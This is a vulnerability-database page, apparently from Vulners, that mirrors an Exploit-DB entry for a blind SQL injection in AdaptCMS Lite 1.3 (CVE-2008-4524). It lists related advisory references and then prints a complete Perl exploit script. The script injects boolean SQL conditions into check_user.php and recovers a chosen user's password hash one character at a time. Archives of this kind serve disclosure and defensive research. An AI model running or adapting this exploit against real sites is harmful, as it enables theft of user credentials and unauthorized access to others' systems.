Lucene search
+L

AdaptCMS Lite 1.3 - Blind SQL Injection

🗓️ 03 Oct 2008 00:00:00Reported by StAkeRType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

AdaptCMS Lite 1.3 Blind SQL Injection vulnerability in check_user.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-4524
3 Oct 200800:00
circl
cve
CVE
CVE-2008-4524
9 Oct 200818:00
cve
cvelist
Cvelist
CVE-2008-4524
9 Oct 200818:00
cvelist
euvd
EUVD
EUVD-2008-4505
7 Oct 202500:30
euvd
github
Github Security Blog
AdaptCMS SQL Injection vulnerability
2 May 202200:10
github
gitlab
GitLab Advisory Database
AdaptCMS SQL Injection vulnerability
2 May 202200:00
gitlab
nvd
NVD
CVE-2008-4524
9 Oct 200818:14
nvd
osv
OSV
GHSA-QRW3-MQ8R-CQ7Q AdaptCMS SQL Injection vulnerability
2 May 202200:10
osv
prion
Prion
Sql injection
9 Oct 200818:14
prion
#!/usr/bin/perl
# -----------------------------------------------------
# AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit
# Discovered By StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On 03/10/2008
# -----------------------------------------------------
# Download http://www.insanevisions.com/page/downloads
# -----------------------------------------------------
use strict;
use LWP::UserAgent;

my ($hash,$send,$sub) = (undef,undef,1);
my ($host,$uid) = @ARGV;

usage() unless $host =~ /^http:\/\/(.+?)$/i and $uid =~ /^[0-9]$/;

sub send_request
{
  my $param = shift @_;
  my $http = new LWP::UserAgent;
  my $post = $http->post($host.'/includes/check_user.php',[ user_name => $param ]);

  if($post->is_success)
  {
    return 38 unless $post->content =~ /yes/i;
  }
}

my @chars = (48..57, 97..102);

for(0..32)
{
  foreach my $set(@chars)
  {
    $send = "' or ascii(substring((select password".
            " from adaptcms_users where id=$uid),$sub,1))=$set#";

    if(send_request($send) > 1)
    {
      $hash .= chr($set);
      $sub++;
      last;
    }
  }
}

sub usage
{
  print "[?] AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit\n";
  print "[?] Usage: perl $0 http://[host] [user id]\n";
  exit;
}

if(defined $hash)
{
  print "[?] Hash: $hash\n";
  exit;
}
else
{
  print "[?] Exploit Failed!\n";
  exit;
}

# milw0rm.com [2008-10-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.0125
35